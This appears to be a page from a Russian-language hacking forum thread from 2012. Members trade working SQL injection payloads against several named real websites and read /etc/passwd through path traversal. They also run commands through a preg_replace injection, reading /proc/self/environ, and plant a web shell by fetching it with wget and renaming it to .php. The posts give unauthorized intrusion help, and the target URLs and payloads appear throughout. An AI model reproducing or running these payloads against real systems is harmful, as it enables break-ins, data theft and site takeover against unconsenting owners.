Старый 24.11.2012, 19:42   #2531
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

devv,you cant extract tables since you cannot use . (dot)
Код:
http://ya-ob.ru/search/'and+updatexml(1,concat(0x27,(select+1+from+`x.x`)),1)%23
Table 'wwwrosrieltcom_adv.x x' doesn't exist
the dot is missing,so you cant use this dot in 'information_schema.tables'.
so instead,you can guess tables.
Код:
http://ya-ob.ru/search/'and+updatexml(1,concat(0x27,(select+1+from+table)),1)%23
if you will see " XPATH syntax error: ''1' ",the table is exist,and you can get the columns using double query.

Цитата:
Сообщение от DeepShadow Посмотреть сообщение
Наткнулся на 1 скулю интересную, MSSQL+INSERT...

POST /shopcustregister.asp

Host: www.totallyshoes.co.uk
Connection: Keep-alive
User-Agent: Mozilla/18.0
Content-Type: application/x-www-form-urlencoded

action=1'&blnmaillist=TRUE&straddress=alala&stradd ress2=ololo&strcity=LoL CiTy&strcountry=MO&strEmail=obama@usa.gov&strfirst name=hitman&strlastname=hitman&strpassword1=werw34 r523q&strpassword2=werw34r523q&strPhone=111-222-3333&strpostcode=94102

хотел оборвать запрос ; и провернуть что-то типа time based.... не прокатило... команды тож не выполняет (видимо права не те)

Чего-нить интересненькое можно замутить)? Или с инсертом только изменять записи в доступных базах/таблицах можно?
you got a vuln in search form.
in-
http://www.totallyshoes.co.uk/shopcustregister.asp

user = totallyshoes
Код:
'or(1)=(user)or(1)='1

Последний раз редактировалось spari; 24.11.2012 в 19:59..
spari вне форума   Ответить с цитированием
Старый 24.11.2012, 19:43   #2532
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Gloward
Цитата:
/page.php?page=/../../../../../../etc/passwd
PHP проигнорирует обращение к свойству несуществующего объекта, а неопределенную константу приведет к строчке с ее именем. Получится: include('PANEL_ROOT/../../../../../../etc/passwd');

Последний раз редактировалось Untitled; 24.11.2012 в 19:47..
Untitled вне форума   Ответить с цитированием
Старый 25.11.2012, 19:11   #2533
DeepShadow
 
Регистрация: 24.11.2012
Сообщений: 5
Репутация: 0
По умолчанию

А еще вопрос тогда...

http://www.totallyshoes.co.uk/byz_pes_results.asp?q='or(1)=(select(TABLE_NAME) from INFORMATION_SCHEMA.TABLES)or(1)='1&maxrecs=5&table =products_home&sid=0.025935017240593994

Цитата:
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the varchar value '%' to data type int.
http://www.totallyshoes.co.uk/byz_pes_results.asp?q='or(1)=(select(TOP 1 TABLE_NAME) from INFORMATION_SCHEMA.TABLES)or(1)='&maxrecs=5&table= products_home&sid=0.025935017240593994

Цитата:
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'TOP'.
ругается на ='1 и на TOP, соответственно, насколько я понимаю...фильтрация тут вроде только на @@ стоит, причем кривая -

http://www.totallyshoes.co.uk/byz_pes_results.asp?q='or(1)=(@@@@version)or(1)='& maxrecs=5&table=products_home&sid=0.02593501724059 3994

таки выводит версию...

Последний раз редактировалось DeepShadow; 25.11.2012 в 19:15..
DeepShadow вне форума   Ответить с цитированием
Старый 25.11.2012, 22:40   #2534
devv
 
Регистрация: 08.10.2012
Сообщений: 27
Репутация: -4
По умолчанию

Просьба, посмотрите ещё одну SQL:
Код:
http://www.armtoday.info/default.asp?search=%27&submit=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C&mode=allwords&SectionID=-1&Lang=_Ru
Я чуть не выпал когда увидел 2 ошибки разных типов баз данных, и mssql и mysql одновременно
Судя по количеству ошибок в пользу мускула, возможно там он, но скрипт .asp что как бе намекает на mssql...
Ни то ни другое раскрутить не получилось, буду признателен.
devv вне форума   Ответить с цитированием
Старый 25.11.2012, 22:59   #2535
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

devv
Там нет никаких mssql

ps:Заканчивай забивать топик линками с кавычками на конце, или начинай сам что-то делать, или я буду выпиливать вопросы (или акки )
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 25.11.2012, 23:47   #2536
aspi
 
Аватар для aspi
 
Регистрация: 19.09.2012
Сообщений: 26
Репутация: -4
По умолчанию

Появилась проблема, залил шелл запускается, но не работает. Ни обзор директорий, никакие вкладки на шелл не работают, невозможно создать файл и тд. В всо пароль даже не вводиться. Safe mode: OFF, openbasedir нет. Думаю проблема в .htaccess. Как решить данную проблему?
aspi вне форума   Ответить с цитированием
Старый 26.11.2012, 07:48   #2537
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

Цитата:
Сообщение от aspi Посмотреть сообщение
Появилась проблема, залил шелл запускается, но не работает. Ни обзор директорий, никакие вкладки на шелл не работают, невозможно создать файл и тд. В всо пароль даже не вводиться. Safe mode: OFF, openbasedir нет. Думаю проблема в .htaccess. Как решить данную проблему?
Начни с disable_functions.
Иногда лочат не только php-функции, но и функции популярных шеллов, например wsoLogin.
nikp вне форума   Ответить с цитированием
Старый 26.11.2012, 20:37   #2538
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от devv Посмотреть сообщение
Просьба, посмотрите ещё одну SQL:
Код:
http://www.armtoday.info/default.asp?search=%27&submit=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C&mode=allwords&SectionID=-1&Lang=_Ru
Я чуть не выпал когда увидел 2 ошибки разных типов баз данных, и mssql и mysql одновременно
Судя по количеству ошибок в пользу мускула, возможно там он, но скрипт .asp что как бе намекает на mssql...
Ни то ни другое раскрутить не получилось, буду признателен.
its mysql on ole db,not mssql.
the injection point is here-
Код:
SELECT * FROM tblNews WHERE MATCH (News_title_Ru, News_item_Ru) AGAINST ('injection' IN BOOLEAN MODE) order by column
also,there is kind of waf,so you can count the columns like-
Код:
http://www.armtoday.info/default.asp?search=')group/**/by(7)%23a&submit=&mode=allwords&SectionID=-1&Lang=_Ru
Unknown column '7' in 'group statement'
and union-
Код:
http://www.armtoday.info/default.asp?search=')union(select(1),2,3,4,5,6)%23a&submit=&mode=allwords&SectionID=-1&Lang=_Ru
columns 3&4.
spari вне форума   Ответить с цитированием
Старый 28.11.2012, 20:50   #2539
zenon3
 
Регистрация: 14.11.2012
Сообщений: 4
Репутация: 0
По умолчанию

Есть вот такак уязвимоть http://ecoportal.su/marketing.php?parent=%24{%40system%28pwd%29}
Но никак не могу залить шелл. Както очень выборочно выполняются команды. Например ls -la не могу выполнить. Ничего не выводит. А вот pwd и whoami без проблем. Может кто подскажет. Если можно продублировать подсказку в PM.
zenon3 вне форума   Ответить с цитированием
Старый 28.11.2012, 22:48   #2540
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от zenon3 Посмотреть сообщение
Есть вот такак уязвимоть http://ecoportal.su/marketing.php?parent=%24{%40system%28pwd%29}
Но никак не могу залить шелл. Както очень выборочно выполняются команды. Например ls -la не могу выполнить. Ничего не выводит. А вот pwd и whoami без проблем. Может кто подскажет. Если можно продублировать подсказку в PM.
since the injection inside preg_replace,you can execute commands like that-
Код:
http://ecoportal.su/marketing.php?parent=${@system($_GET[c])}&c=id
you can read /proc/self/environ,and upload a shell like in lfi.
Код:
http://ecoportal.su/marketing.php?parent=${@system($_GET[c])}&c=cat /proc/self/environ
you can read other log file with user-agent,and change your use agent to
Код:
wget site.com/shell.txt;mv shell.txt shell.php
and then
Код:
site.com/shell.php
spari вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot